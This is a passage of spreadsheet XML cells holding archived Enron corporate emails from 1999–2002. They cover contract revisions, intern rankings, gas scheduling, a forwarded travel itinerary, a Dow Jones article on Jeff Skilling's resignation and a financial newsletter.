&gt;&gt; &gt;  friends too quickly or easily, but someone who's_x000D_
&gt;&gt; &gt;  extremely loyal to friends you do make and who expect_x000D_
&gt;&gt; &gt;  the same loyalty in return. Those who really get to_x000D_
&gt;&gt; &gt;  know you realize it takes a lot to shake your trust in_x000D_
&gt;&gt; &gt;  your friends, but equally that it takes you a long_x000D_
&gt;&gt; &gt;  time to get over it if that trust is ever broken._x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;  21 TO 30 POINTS:_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;     Your friends see you as painstaking and fussy. They_x000D_
&gt;&gt; &gt;  see you as very cautious, extremely careful, a slow_x000D_
&gt;&gt; &gt;  and steady plodder.  It'd really surprise them if you_x000D_
&gt;&gt; &gt;  ever did something impulsively or on the spur of the_x000D_
&gt;&gt; &gt;  moment, expecting you to examine everything carefully_x000D_
&gt;&gt; &gt;  from every angle and then, usually decide against it._x000D_
&gt;&gt; &gt;  They think this reaction is caused partly by your_x000D_
&gt;&gt; &gt;  careful nature._x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;  UNDER 21 POINTS:_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;     People think you are shy, nervous, and indecisive,_x000D_
&gt;&gt; &gt;  someone who needs looking after, who always wants_x000D_
&gt;&gt; &gt;  someone else to make the decisions &amp; who doesn't want_x000D_
&gt;&gt; &gt;  to get involved with anyone or anything.  They see you_x000D_
&gt;&gt; &gt;  as a worrier who always sees problems that don't_x000D_
&gt;&gt; &gt;  exist.  Some people think you're  boring.  Only those_x000D_
&gt;&gt; &gt;  who know you well know that you aren't._x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;      Now forward this on to everyone you know, making_x000D_
&gt;&gt; &gt;  sure to put YOUR score in the subject box!_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 - att1.htm</t>
  </si>
  <si>
    <t>Wed, 6 Dec 2000 06:40:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Important news article</t>
  </si>
  <si>
    <t xml:space="preserve">Your type of article! </t>
  </si>
  <si>
    <t>Tue, 2 Oct 2001 14:32:32 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">This is an automatically generated Delivery Status Notification._x000D_
_x000D_
Your message has been successfully relayed to the following recipients, but the requested delivery status notifications may not be generated by the destination._x000D_
_x000D_
       lora.aria@lgeenergy.com_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 12 Feb 2001 01:03:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jared.kaiser@enron.com', 'john.taylor@enron.com', 'jill.zivley@enron.com', 'ruth.concannon@enron.com', 'robin.barbe@enron.com', 'bill.brogan@enron.com', 'gil.muhl@enron.com', 'john.singer@enron.com', 'nelson.ferries@enron.com', 'phil.demoes@enron.com', 'linda.roberts@enron.com', 'john.hodge@enron.com', 'tammi.depaolis@enron.com', 'david.jones@enron.com', 'kimberly.brown@enron.com', 'gary.bryan@enron.com'})</t>
  </si>
  <si>
    <t>One more thing</t>
  </si>
  <si>
    <t>In addition, bring your write ups for the not-so-hot-list, so that Kim can _x000D_
prepare.  Kim, be ready to discuss status of getting everyone on the "O" _x000D_
drive._x000D_
_x000D_
Thanks_x000D_
_x000D_
Frank</t>
  </si>
  <si>
    <t>Tue, 20 Jun 2000 05:43:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lhanse@br-inc.com'})</t>
  </si>
  <si>
    <t>frozenset({'lmarlatt@br-inc.com', 'gerald.nemec@enron.com', 'choekenga@br-inc.com'})</t>
  </si>
  <si>
    <t>re: LLC and Admin. Agreement Revisions</t>
  </si>
  <si>
    <t xml:space="preserve">Chris, if lang has been drafted to address the various changes to the LLC_x000D_
agreements I would like to discuss and brainstorm a little to hopefully catch_x000D_
as many of the issues as possible in the round of changes.  Let me know when_x000D_
you want to review lang.  Thanks, Lee H_x000D_
---------- Original Text ----------_x000D_
_x000D_
From: Lori Marlatt@LGALAW@COR, on 6/12/00 10:22 AM:_x000D_
_x000D_
Gerald:_x000D_
_x000D_
I've looked at the changes you've made to the LLC Agreement, as well as to_x000D_
the Capacity Allocation Agreement, and the Amended Admin. Services Agreement,_x000D_
and am on board with all revisions.  I believe the changes we were requesting_x000D_
in the Cap. Alloc. Agrmt., as relayed to me by Hoekenga, are adequately_x000D_
addressed in your draft.  Thus, unless Chris or Lee Hanse have anything to_x000D_
add to the documents, I believe they are ready to execute._x000D_
_x000D_
Once executed, please provide an execution copy to me for filing in our_x000D_
records._x000D_
_x000D_
Thanks!_x000D_
Lori_x000D_
----------_x000D_
From: "Gerald Nemec" &lt;Gerald.Nemec@enron.com&gt;, on 6/9/00 3:38 PM:_x000D_
_x000D_
_x000D_
_x000D_
Attached are redlined versions of an amended and restated LLC agreement and an_x000D_
amendment to the Administrative Services Agreement.  I decided to simply amend_x000D_
the Admin. Agreement since the change was so minor.  You will note that the_x000D_
changes in the LLC Agreement were solely to accommodate the revisions made in_x000D_
the Capacity Allocation Agreement which I forwarded earlier.  Please call if_x000D_
you_x000D_
have any questions._x000D_
_x000D_
(See attached file: Amendment to Admin Agreement1red.doc)(See attached file:_x000D_
Amended and Restated LLC Agreement(Red).doc)_x000D_
</t>
  </si>
  <si>
    <t>Wed, 9 May 2001 13:24:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mark.duffey@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'jskilli@enron.com'})</t>
  </si>
  <si>
    <t>Jeff,_x000D_
_x000D_
     Thanks again for taking the time to meet with Alfredo and I yesterday._x000D_
We felt the meeting was very useful and informative.  Talk with you soon._x000D_
_x000D_
Mark</t>
  </si>
  <si>
    <t>Mon, 29 Jan 2001 00:43:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'lee.jackson@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'kristin.gandy@enron.com', 'harry.arora@enron.com'})</t>
  </si>
  <si>
    <t>Summer Interns</t>
  </si>
  <si>
    <t>Here is my summary of our second round summer interviews.  Top 3 candidates _x000D_
below._x000D_
_x000D_
1. Craig -  Well rounded, Military background, excellent leadership _x000D_
experience (aircraft carrier pilot), did not have a finance background, but _x000D_
performed very well on Harry's analytical interview.  Very personable, _x000D_
confident and sold himself well.  I think he is very interested in Enron and _x000D_
would likely accept._x000D_
_x000D_
2. Victor - He was a strong candidate in my more subjective interview, but I _x000D_
didn't think he was quite as strong as Ajay.  However he outperformed Ajay in _x000D_
the analytical interview.  With that feedback from Harry I feel comfortable _x000D_
placing Victor ahead of Ajay.  Also very interested in Enron._x000D_
_x000D_
3. Ajay -  Very polished, presented/sold himself very well, Excellent _x000D_
understanding of Enron's business (did his homework),  Relative to others _x000D_
based on my interview he ranked in the top 2, However did not perform as well _x000D_
as others in the top 4-5 in the analytical interview.  For this reason I'd _x000D_
push him back to number three._x000D_
_x000D_
Aside from these three there were two others that are worth discussing.  _x000D_
_x000D_
Casey Jones_x000D_
Andrew Rosenberg_x000D_
_x000D_
We Understand these two may have outstanding offers from firms that they are _x000D_
very interested in.  I would not consider either of these two ahead of Craig, _x000D_
but might place Casey ahead of Victor.  However I think Casey is least likely _x000D_
to accept the offer.  My suggestion would be to make offers to Craig &amp; _x000D_
Victor, then consider a 3rd offer to Andrew, recognizing we would likely get _x000D_
a maximum of 2/3._x000D_
_x000D_
Lee Jackson</t>
  </si>
  <si>
    <t>Tue, 24 Apr 2001 11:22:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jeffrey.gossett@enron.com', 'errol.mclaughlin@enron.com'})</t>
  </si>
  <si>
    <t>Deals today</t>
  </si>
  <si>
    <t>We checked a few deals that have gone through so far today.  Please review the following and let me know how they are bridging._x000D_
_x000D_
V51265_x000D_
V51261_x000D_
V51270_x000D_
_x000D_
Thank you for your help._x000D_
_x000D_
Dawn</t>
  </si>
  <si>
    <t>Thu, 30 Dec 1999 07:36:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: SAM</t>
  </si>
  <si>
    <t xml:space="preserve">Mike, _x000D_
_x000D_
Thanks. Let me talk to McBride about the comp levels._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Mike A Roberts                           12/30/99 06:31 AM_x000D_
	_x000D_
_x000D_
To: Vince J Kaminski/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: SAM_x000D_
_x000D_
Vince---_x000D_
_x000D_
 I had a chance to corner Sam.  He says to leave ProStaff he needs $30K_x000D_
_x000D_
--- Mike_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 10 Jul 2000 16:13:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Canada Exotics</t>
  </si>
  <si>
    <t xml:space="preserve">looks good_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Robin Rodrigue_x000D_
07/10/2000 09:08 PM_x000D_
To: Kathy Reeves/CAL/ECT@ECT, Nicole LaPorte/CAL/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Canada Exotics  _x000D_
_x000D_
Here are the FT Positions including the Exotics._x000D_
_x000D_
_x000D_
_x000D_
Robin_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 7 Aug 2000 06:07:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mkhenderson@duke-energy.com'})</t>
  </si>
  <si>
    <t>frozenset({'cwcass@duke-energy.com', 'bmcmills@duke-energy.com', 'cwester@duke-energy.com', 'jabretz@duke-energy.com', 'wespeckels@duke-energy.com', 'dcspencer@duke-energy.com', 'mrcherry@duke-energy.com', 'jaurbanek@duke-energy.com', 'dfarmer@enron.com', 'briley@enron.com', 'dfbane@duke-energy.com', 'djlevy@duke-energy.com', 'carlos.j.rodriguez@enron.com', 'sbeemer@duke-energy.com'})</t>
  </si>
  <si>
    <t>Eastrans Nomination change effective 8/8/00</t>
  </si>
  <si>
    <t xml:space="preserve">Please decrease deliveries to Eastrans to 0 MMBtu/dy for 8/8/00_x000D_
_x000D_
The redeliveries will be 0 as well._x000D_
_x000D_
 The over-delivery quantity for the Fuels Cotton Valley gas will be valued per_x000D_
paragraph 3 of the Contract Price section in the Transaction Agreement._x000D_
</t>
  </si>
  <si>
    <t>Thu, 25 Jan 2001 05:58:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Basin Production from GA 213</t>
  </si>
  <si>
    <t xml:space="preserve">Daren,_x000D_
_x000D_
I've just received word from Basin to bring production on sometime today or _x000D_
tomorrow (they expect to get up to b/t 10,000-15,000d); if our facility _x000D_
planning engineer determines that we can take the gas, then it will flow for _x000D_
all of February and be priced at 100% Gas Daily less $0.16._x000D_
_x000D_
vlt_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Daren J Farmer_x000D_
01/25/2001 01:47 PM_x000D_
To: Vance L Taylor/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Basin Production from GA 213  _x000D_
_x000D_
I need for you, or the Producer Services group, to determine if you think the _x000D_
gas will flow for the month and at what price.  I will use your decision for _x000D_
our bidweek postion._x000D_
_x000D_
D_x000D_
_x000D_
_x000D_
_x000D_
Vance L Taylor_x000D_
01/25/2001 11:53 AM_x000D_
To: Daren J Farmer/HOU/ECT@ECT, Robert Cotten/HOU/ECT@ECT_x000D_
cc: Susan Smith/HOU/ECT@ECT, Melissa Graves/HOU/ECT@ECT _x000D_
Subject: Basin Production from GA 213_x000D_
_x000D_
FYI,_x000D_
_x000D_
How would you want to handle for February nomination?_x000D_
_x000D_
vlt_x000D_
x3-6353_x000D_
---------------------- Forwarded by Vance L Taylor/HOU/ECT on 01/25/2001 _x000D_
11:55 AM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Brad Blevins                           01/25/2001 10:56 AM_x000D_
	_x000D_
_x000D_
To: John Peyton/HOU/ECT@ECT_x000D_
cc: Nick Cocavessis/Corp/Enron@ENRON, Steve -HPL- Schneider/HOU/ECT@ECT, Pat _x000D_
Flavin/GCO/Enron@Enron, Vance L Taylor/HOU/ECT@ECT, Buck _x000D_
Thomas/GCO/Enron@ENRON _x000D_
Subject: Basin Production from GA 213_x000D_
_x000D_
I have reviewed the gas composition analysis from SPL of the Basin production _x000D_
from GA 213.  While SPL's analysis does show a dewpoint of around 20 degrees _x000D_
F at 400 psig, it is both my and John Handley's opinion that the gas from the _x000D_
wellbore had stratified by the time that this sample was taken.  We expect _x000D_
the dewpoint of the flowing gas to be higher.  However, this was the best _x000D_
sample that could be obtained at the time.  We have conferred with Steve _x000D_
Schneider and we are willing to take this gas on a conditional basis over the _x000D_
next couple of days.  Once the 6" line has been pigged, the production flows _x000D_
stablilized and Mitchell's conditioning equipment lined out over the next _x000D_
couple of days, HMS will need to take another sample at the meter run and _x000D_
have SPL run an extended analysis with a dewpoint curve on an expedited _x000D_
basis.  Should this sample indicate a dewpoint over 45 degrees F, then this _x000D_
production will be shut in again until hydrocarbon dewpoint conditioning _x000D_
equipment has been installed.  In the meantime, HMS needs to keep a close _x000D_
watch on all Southern Union city gates on Galveston Island to monitor for _x000D_
liquids fallout._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 30 Mar 2001 07:50:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Fwd: Fw: china</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Gerald Nemec/HOU/ECT on 03/30/2001 03:50 PM -----_x000D_
_x000D_
	CCGROOVES@aol.com_x000D_
	03/30/2001 03:44 PM_x000D_
		 _x000D_
		 To: gerald.nemec@enron.com_x000D_
		 cc: _x000D_
		 Subject: Fwd: Fw: china_x000D_
_x000D_
_x000D_
Hi Gerald._x000D_
_x000D_
Here it is............._x000D_
_x000D_
Cathy_x000D_
_x000D_
Return-Path: &lt;Jgillaspieci3@netzero.net&gt;_x000D_
Received: from  rly-zc03.mx.aol.com (rly-zc03.mail.aol.com [172.31.33.3]) by _x000D_
air-zc05.mail.aol.com (v77_r1.36) with ESMTP; Wed, 28 Mar 2001 17:43:39 -0500_x000D_
Received: from  mail8.wlv.netzero.net (mail8.wlv.netzero.net _x000D_
[209.247.163.58]) by rly-zc03.mx.aol.com (v77_r1.36) with ESMTP; Wed, 28 Mar _x000D_
2001 17:43:02 1900_x000D_
Received: (qmail 29009 invoked from network); 28 Mar 2001 22:41:12 -0000_x000D_
Received: from pppa16-resalehoustonb2-2r7009.dialinx.net (HELO jgillaspie) _x000D_
(4.4.18.141)  by mail8.wlv.netzero.net with SMTP; 28 Mar 2001 22:41:12 -0000_x000D_
Message-ID: &lt;001301c0b7d9$636f5200$8d120404@ci3.com&gt;_x000D_
From: "Jgillaspieci3" &lt;Jgillaspieci3@netzero.net&gt;_x000D_
To: &lt;CCGROOVES@aol.com&gt;_x000D_
Subject: Fw: china_x000D_
Date: Wed, 28 Mar 2001 16:49:45 -0600_x000D_
MIME-Version: 1.0_x000D_
Content-Type:  multipart/alternative; _x000D_
boundary="----=_NextPart_000_0010_01C0B7A7.17D17BC0"_x000D_
X-Priority: 3_x000D_
X-MSMail-Priority: Normal_x000D_
X-Mailer: Microsoft Outlook Express 5.00.2615.200_x000D_
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200_x000D_
_x000D_
_x000D_
We own them. Here's the info Baby!!!_x000D_
?_x000D_
Lovin you......_x000D_
?_x000D_
Missin you......_x000D_
?_x000D_
Jeff_x000D_
----- Original Message -----  _x000D_
From: Donna Jacobsen _x000D_
To: jgillaspieci3@netzero.net _x000D_
Sent: Wednesday, March 28, 2001 5:24 PM_x000D_
Subject: china_x000D_
_x000D_
?_x000D_
_x000D_
_x000D_
?JEFF  GILLASPIE????????????????????????  GILLASPIE/JEFFREY  _x000D_
A????????????????  _x000D_
?P.O. BOX  7134?????????????????????????  CLARKE/CATHLEEN  _x000D_
M??????????????????  _x000D_
?HOUSTON TX?  77007????????????????????????????????????????????????????????  _x000D_
_x000D_
?MAR 28 2001???  ITIN????????? AGENT  CODE:1KN7DJ???? CUSTOMER CODE:ILLAS-JEF_x000D_
_x000D_
?06 JUN  01 - WEDNESDAY_x000D_
? NORTHWST AIR FLIGHT:  6007???????????????  CLASS: Q???? CONFIRMED _x000D_
? LV:?  HOUSTON/INTCON??????????????????????  1200N??????????????  NONSTOP??? _x000D_
? ARR:  TOKYO/NARITA?????????????????????????  335P??????????????  MILES: 6642_x000D_
? AIRCRAFT: BOEING 777  JET????????????????????????????????  FLT. TIME: 13:35_x000D_
?  LUNCH-DINNER???????????????????????????????????????????????????  _x000D_
_x000D_
?07 JUN 01 - THURSDAY _x000D_
? NORTHWST AIR FLIGHT:??  11???????????????  CLASS: Q???? CONFIRMED _x000D_
? LV:?  TOKYO/NARITA?????????????????????????  635P??????????????  NONSTOP??? _x000D_
? ARR:  SHANGHAI/PUDON???????????????????????  835P??????????????  MILES: 1119_x000D_
? AIRCRAFT: BOEING 747  JET????????????????????????????????  FLT. TIME:? 3:00_x000D_
?  DINNER?????????????????????????????????????????????????????????  _x000D_
_x000D_
?16 JUN 01 - SATURDAY _x000D_
? NORTHWST AIR FLIGHT:  5985???????????????  CLASS: Q???? CONFIRMED _x000D_
? LV:?  SHANGHAI/PUDON???????????????????????  550P??????????????  NONSTOP??? _x000D_
? ARR: SAN  FRANCISCO????????????????????????  105P??????????????  MILES: 6151_x000D_
? AIRCRAFT: BOEING 747  JET????????????????????????????????  FLT. TIME: 10:15_x000D_
?  DINNER-BREAKFAST???????????????????????????????????????????????  _x000D_
_x000D_
? NORTHWST AIR FLIGHT:  6442???????????????  CLASS: Q???? CONFIRMED _x000D_
? LV:? SAN  FRANCISCO????????????????????????  300P??????????????  NONSTOP??? _x000D_
? ARR:  HOUSTON/INTCON???????????????????????  831P??????????????  MILES: 1635_x000D_
? AIRCRAFT: BOEING 757  JET????????????????????????????????  FLT. TIME:? 3:31_x000D_
?  SNACK??????????????????????????  SEAT-14D14E????????????????????  _x000D_
_x000D_
?**RATES SUBJECT TO CHANGE UNTIL BOOKED AND  TICKETED**????????????????  _x000D_
?FARE QUOTED $812.60? PER PERSON. RATE INCLUDES ALL TAXES AND  FEES???? _x000D_
?THANK YOU FOR CALLING TRAVEL  INC.????????????????????????????????????  _x000D_
?A GOVERNMENT ISSUED PHOTO ID IS REQUIRED TO BOARD ALL  FLIGHTS.??????? _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 24 Aug 2001 09:46:06 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'rahil.jafry@enron.com'})</t>
  </si>
  <si>
    <t>POWER POINTS: Skilling Moves On To Charities, Family</t>
  </si>
  <si>
    <t>The last few lines  :-&gt;)_x000D_
_x000D_
-----Original Message-----_x000D_
From: djcustomclips@djinteractive.com_x000D_
[mailto:djcustomclips@djinteractive.com]_x000D_
Sent: Friday, August 24, 2001 12:22 PM_x000D_
To: 168842@mailman.enron.com_x000D_
Subject: Rahil Jafry: POWER POINTS: Skilling Moves On To Charities,_x000D_
Family_x000D_
_x000D_
_x000D_
POWER POINTS: Skilling Moves On To Charities, Family_x000D_
By Mark Golden_x000D_
_x000D_
08/24/2001_x000D_
Dow Jones Energy Service_x000D_
(Copyright (c) 2001, Dow Jones &amp; Company, Inc.)_x000D_
_x000D_
  NEW YORK -(Dow Jones)- Jeff Skilling will be spending the next few years_x000D_
working with charities in Houston and spending time with family, the former_x000D_
chief executive of Enron Corp. (ENE) said in an interview.   _x000D_
_x000D_
  The 47-year-old Skilling, who resigned abruptly from Enron after the_x000D_
company's board meeting Aug. 14, repeatedly said he had left - as stated - for_x000D_
personal reasons. Wall Street has been skeptical of the explanation, and_x000D_
several analysts have said they're waiting for "the other shoe to drop." The_x000D_
company's stock price fell 14% in response to the announcement last week - a_x000D_
loss of about $4.5 billion in shareholder value - and hasn't recovered this_x000D_
week._x000D_
  But the former chief executive said the stock price will recover once_x000D_
investors see that his departure isn't a precursor to more bad news for the_x000D_
company.   _x000D_
_x000D_
  "I've spent the last 34 years working really hard," said Skilling, who_x000D_
requested the interview with Dow Jones Newswires. "There are a lot of things_x000D_
that I haven't been doing - personal interests, spending time with family._x000D_
There are a number of charitable things that I haven't spent the time on that_x000D_
I believe I should. I don't mean fundraising, but hands on, getting out and_x000D_
doing things, building houses, helping individuals."   _x000D_
_x000D_
  Skilling, who has been involved with a multiple sclerosis charity for years,_x000D_
said he plans to get involved in promoting the City of Houston.   _x000D_
_x000D_
  "It's massively underrated as a place to work and live," he said. "It's a_x000D_
great city, and I think I can do a lot to get that across."   _x000D_
_x000D_
  Though insistent that there is nothing more to his departure than personal_x000D_
reasons, Skilling said little to reveal why a talented executive would_x000D_
surrender the top spot of the country's largest energy trading company just_x000D_
six months after taking the job. Skilling had been Enron's No. 2 executive_x000D_
from 1997 until this year, and he's generally credited with the success of_x000D_
Enron's wholesale trading operations, which comprise about 80% of the parent's_x000D_
earnings.   _x000D_
_x000D_
  He confirmed there's no crisis in his family, and his health is fine._x000D_
Skilling, who assumed the chief executive title on Feb. 12, also denied that_x000D_
he was suffering under the strain of the job.   _x000D_
_x000D_
  Late last week, Chairman Kenneth Lay and other Enron executives in New York_x000D_
told Wall Street analysts that Skilling had been going "kind of nuts" under_x000D_
the pressure of being chief executive, one analyst said.   _x000D_
_x000D_
  "It's not true that I was cracking up," he said. "Do I sound like someone_x000D_
who is cracking up? The representation of me as thick-skinned is a reasonable_x000D_
representation."   _x000D_
_x000D_
  When asked if his departure could have been handled more smoothly so as not_x000D_
to alarm investors, Skilling said that perhaps the mechanics could have been_x000D_
better, but said that is hindsight.   _x000D_
_x000D_
  "We thought it through and thought we were going about it in the right way,"_x000D_
he said. "I don't know what we could have done differently. It will turn out,_x000D_
in retrospect, fine, as soon as people see that there's nothing else." _x000D_
 _x000D_
   About One Week's Notice _x000D_
   _x000D_
_x000D_
  The former chief executive totally disagreed with speculation in this column_x000D_
last week that Enron Chairman Kenneth Lay, who immediately resumed the role of_x000D_
chief executive, may have wanted to regain day-to-day control of the company_x000D_
and pushed Skilling out.   _x000D_
_x000D_
  "I think the world of Ken. You can't find a bigger fan of his than me," he_x000D_
said. "I was not forced out. Personal and family reasons are 100% of the_x000D_
story. I guess it's kind of mundane, and I'm sorry it doesn't have as much_x000D_
drama and suspense as a lot of people would like it to have, but that's what_x000D_
the deal is."   _x000D_
_x000D_
  Skilling said he spoke with Lay about wanting to do other things many times_x000D_
over the years. The first serious discussion of his imminent departure came_x000D_
about a week before the announcement, said Skilling, whose recollection of his_x000D_
giving notice to Lay was somewhat cloudy.   _x000D_
_x000D_
  "The board knew what was going on, and that was the point (the Aug. 14 board_x000D_
meeting) where the decisions were going to be made," he said.   _x000D_
_x000D_
  The decisions?   _x000D_
_x000D_
  "I guess to accept my resignation," Skilling said.   _x000D_
_x000D_
  Enron refused to release a copy of the minutes of the Aug. 14 board meeting,_x000D_
which was regularly scheduled. The company doesn't generally release_x000D_
board-meeting minutes, spokeswoman Karen Denne said.   _x000D_
_x000D_
  The former chief executive continues to work as a paid adviser to Enron. A_x000D_
clause in his contract prevents him from competing with the company through_x000D_
the end of 2003, and he has no plans to work outside the energy industry.   _x000D_
_x000D_
  That might sound like a big comedown from running the country's most_x000D_
aggressive energy company, but Skilling said the move fits.   _x000D_
_x000D_
  "Some people say 'Well, you were working and aspiring so long to become CEO_x000D_
of Enron.' That's not true. I was working to build a business, and we did,"_x000D_
said Skilling, who is credited with transforming the company into a trading_x000D_
powerhouse.   _x000D_
_x000D_
  "The company I built is doing great. My life is moving on."   _x000D_
_x000D_
  He also said the company will do fine without him. Some analysts have_x000D_
expressed concern about Enron's ability to retain its top talent. Skilling's_x000D_
predecessor as Enron's No. 2 executive, Richard Kinder, for example, left the_x000D_
company in 1996 after Lay announced that he would be retaining the chief_x000D_
executive spot for another five years. Kinder went on to buy Enron's small_x000D_
liquids pipeline business and turned that company into Kinder-Morgan Inc._x000D_
(KMI).   _x000D_
_x000D_
  Enron's current management, Skilling said, has a "very deep bench." For_x000D_
example, he described Enron Energy Services Chief Executive Dave Delaney as_x000D_
"awesome."   _x000D_
_x000D_
  "Dave created the Canadian business in Enron," Skilling said.   _x000D_
_x000D_
  -By Mark Golden, Dow Jones Newswires; 201-938-4604; mark.golden@dowjones.com_x000D_
_x000D_
_x000D_
_x000D_
Folder Name: Rahil Jafry_x000D_
Relevance Score on Scale of 100: 79_x000D_
_x000D_
_______________________________________________________________________x000D_
_x000D_
To review or revise your folder, visit http://www.djinteractive.com or contact Dow Jones Customer Service by e-mail at custom.news@bis.dowjones.com or by phone at 800-369-7466. (Outside the U.S. and Canada, call 609-452-1511 or contact your local sales representative.)_x000D_
_______________________________________________________________________x000D_
_x000D_
Copyright (c) 2001 Dow Jones &amp; Company, Inc. All Rights Reserved</t>
  </si>
  <si>
    <t>Tue, 13 Feb 2001 07:58:00 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: def leppard</t>
  </si>
  <si>
    <t>i didn't get them through the big e.  some punk broker.</t>
  </si>
  <si>
    <t>Tue, 8 Jan 2002 13:36:41 -0800 (PST)</t>
  </si>
  <si>
    <t>Start Date: 1/8/02; HourAhead hour: 16;</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
Start Date: 1/8/02; HourAhead hour: 16;  No ancillary schedules awarded.  Variances detected._x000D_
Variances detected in Load schedule._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final Schedules\2002010816.txt_x000D_
_x000D_
---- Load Schedule ----_x000D_
$$$ Variance found in table tblLoads._x000D_
     Details: (Hour: 16 / Preferred: 190.17 / Final: 190.14)_x000D_
  TRANS_TYPE: FINAL_x000D_
  LOAD_ID: SDG1_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 1/8/02_x000D_
  SC_ID: ENRJ_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 9 Nov 1999 18:32:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'marcello.romano@enron.com'})</t>
  </si>
  <si>
    <t>IC Books &amp; Products</t>
  </si>
  <si>
    <t>Attached is a spreadsheet with the Trading Books and Products we plan to have _x000D_
set up for Mondays internal launch._x000D_
_x000D_
_x000D_
_x000D_
There is a list of the trading books with their associated company and duns _x000D_
ID (Bob I am missing the options book duns id's and the co's for 2 of the _x000D_
texas books)._x000D_
There is a list of the products for launch, their status and their associated _x000D_
book. (Bob I need trading books matched to Canada products and TRCO/Z6 Basis)._x000D_
Basically their are 3 companies for all these books - Enron North America _x000D_
Corp., Enron Canada Corp. and Houston Pipe Line Company (for texas trades)._x000D_
_x000D_
Their is a Matrix of products and books which needs to be filled in for each _x000D_
books profile (Specifically see current transactions &amp; Tax)._x000D_
I will discuss the access for each US book with Jeff Shankman and Canada with _x000D_
Lavorato._x000D_
_x000D_
Bob will populate the internal transactions normally undertaken by each desk._x000D_
_x000D_
As agreed Credit will have to populate the headroom and tenor daily to test _x000D_
this functionality._x000D_
_x000D_
Mark will draft the letter stating that offline contractual framework will _x000D_
apply._x000D_
_x000D_
Jay should have the bridges set to manual booking by Thursday._x000D_
_x000D_
Bob is covering the booking of these post bridge monitor picking up the _x000D_
bridge failure._x000D_
_x000D_
David will cover tax and credit._x000D_
_x000D_
PCG will set up the trading books as customers with read only access prior to _x000D_
determining their profile. The books will be set to having read ETA's and _x000D_
GTC's._x000D_
This needs to be completed tomorrow as we need to test trading books as _x000D_
counterparties on the system._x000D_
_x000D_
Thanks,_x000D_
Marcello</t>
  </si>
  <si>
    <t>Thu, 2 Nov 2000 01:17:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Breakfast With The Fool: Auto Sales Slowdown</t>
  </si>
  <si>
    <t>__________________________________________________________________x000D_
_x000D_
            B R E A K F A S T   W I T H   T H E   F O O L_x000D_
                    Thursday, November 2, 2000_x000D_
_x000D_
benjamin.rogers@enron.com_x000D_
__________________________________________________________________x000D_
_x000D_
REGISTER TO BECOME A FOOL -- GET FREE STUFF!_x000D_
http://www.fool.com/m.asp?i=179468_x000D_
__________________________________________________________________x000D_
_x000D_
_x000D_
 Sponsored By: American Express_x000D_
 Trade online with American Express and receive low_x000D_
 commissions, personalized planning tools, free news and_x000D_
 research and 24/7 customer service. Apply Now!_x000D_
 http://www.lnksrv.com/m.asp?i=179469_x000D_
_x000D_
_x000D_
"Only a fool holds out for the top dollar." -- Joseph Kennedy_x000D_
_x000D_
_x000D_
AUTO SALES SLOWDOWN_x000D_
After a bang-up year, car companies report slow sales in October._x000D_
_x000D_
By Chris Rugaber_x000D_
_x000D_
To the surprise of some observers, many U.S. and international_x000D_
automakers reported sales declines for the month of October,_x000D_
with the exception of General Motors (NYSE: GM), which benefited_x000D_
from heavy discounts. Figures from Autodata Corp. show that_x000D_
industrywide sales fell 0.9% from October of last year, while_x000D_
forecasts were for a 3.6% increase, according to a Bloomberg_x000D_
report._x000D_
_x000D_
Sales of Ford's (NYSE: F) North American-built vehicles dropped_x000D_
6.3%, partly due to a 16% decline in sales of its Explorer_x000D_
model. Ford cut production of the Explorer in September in order_x000D_
to redirect tires to the company's Explorer recall effort. The_x000D_
